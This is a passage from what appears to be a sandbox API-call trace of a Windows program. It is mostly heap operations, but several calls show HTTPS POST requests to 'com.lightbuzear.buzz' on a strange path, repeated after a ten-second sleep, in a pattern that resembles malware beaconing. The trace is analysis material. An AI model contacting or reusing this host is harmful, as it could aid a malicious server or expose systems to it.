hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef90 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800780 [0263.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0263.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800780 | out: hHeap=0x4780000) returned 1 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800618 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0263.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0263.823] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0263.823] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0263.858] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0263.868] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0265.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008c0 | out: hHeap=0x4780000) returned 1 [0265.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0265.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0265.219] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ede0 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edb0 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ede0 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0265.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0265.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800898 [0265.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0265.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800898 | out: hHeap=0x4780000) returned 1 [0265.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800988 [0265.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0265.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0265.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0265.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0265.222] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0265.222] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0265.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0265.223] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eeb8 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0265.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f050 [0265.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eeb8 | out: hHeap=0x4780000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0265.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f050 | out: hHeap=0x4780000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800780 [0265.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0265.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800780 | out: hHeap=0x4780000) returned 1 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800668 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0265.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a50 [0265.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0265.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0265.225] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0265.225] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0265.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a50 | out: hHeap=0x4780000) returned 1 [0265.225] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0265.226] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0265.226] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0265.226] FreeLibrary (hLibModule=0x71570000) returned 1 [0265.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0265.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0265.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009b0 | out: hHeap=0x4780000) returned 1 [0265.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005c8 | out: hHeap=0x4780000) returned 1 [0265.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800910 | out: hHeap=0x4780000) returned 1 [0265.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0265.227] Sleep (dwMilliseconds=0x2710) [0265.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0265.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eed0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edb0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eed0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0265.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480efc0 [0265.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0265.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0265.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0265.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0265.619] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0265.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0265.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0265.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0265.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0265.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f008 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef78 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f008 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48005c8 [0265.620] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0265.620] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0265.621] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005c8 | out: hHeap=0x4780000) returned 1 [0265.621] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800780 [0265.621] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0265.621] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a50 [0265.621] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0265.621] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0265.621] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0265.622] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0265.622] FreeLibrary (hLibModule=0x71780000) returned 1 [0265.622] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a50 | out: hHeap=0x4780000) returned 1 [0265.622] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0265.622] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007a8 [0265.622] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0265.623] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0265.623] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480efd8 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0265.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efd8 | out: hHeap=0x4780000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee70 [0265.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007d0 [0265.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007d0 | out: hHeap=0x4780000) returned 1 [0265.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0265.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0265.625] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0265.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800690 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef30 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef48 [0265.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef30 | out: hHeap=0x4780000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0265.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef48 | out: hHeap=0x4780000) returned 1 [0265.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef48 [0265.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009b0 [0265.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009b0 | out: hHeap=0x4780000) returned 1 [0265.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0265.627] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f050 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0265.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f050 | out: hHeap=0x4780000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0265.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48007d0 [0265.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0265.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007d0 | out: hHeap=0x4780000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007d0 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0265.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0265.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0265.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0265.630] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0265.630] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0265.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0265.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0265.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0265.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef78 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee88 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee88 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800848 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0265.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008e8 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0265.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005a0 [0265.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0265.632] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0265.632] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0265.632] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0267.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005a0 | out: hHeap=0x4780000) returned 1 [0267.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0267.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0267.773] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0267.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0267.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eed0 